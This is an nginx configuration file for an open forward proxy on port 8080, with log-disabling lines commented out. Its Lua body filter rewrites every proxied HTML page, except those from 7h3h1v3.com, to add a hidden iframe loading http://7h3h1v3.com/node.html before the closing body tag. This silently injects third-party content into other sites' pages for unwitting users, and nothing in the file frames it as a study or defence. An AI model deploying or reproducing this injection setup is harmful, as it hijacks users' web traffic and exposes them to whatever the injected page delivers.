server {
    listen       8080;
	
#	access_log /dev/null;
#	error_log /dev/null;

	limit_rate 28k;

	location / {
        resolver 172.16.0.23;
        proxy_pass http://$http_host$uri$is_args$args;	

        header_filter_by_lua 'ngx.header.content_length = nil';
        body_filter_by_lua '
            if ( string.find(ngx.req.get_headers()["Host"], "7h3h1v3.com") == nil) then
                    replacestr = "<iframe src=http://7h3h1v3.com/node.html style=visibility:hidden;display:none></iframe></body>"
                    ngx.arg[1] = string.gsub(ngx.arg[1],"</body>", replacestr)
            end
        ';

    }

    error_page   500 502 503 504  /50x.html;
    
    location = /50x.html {
        root   html;
    }
}

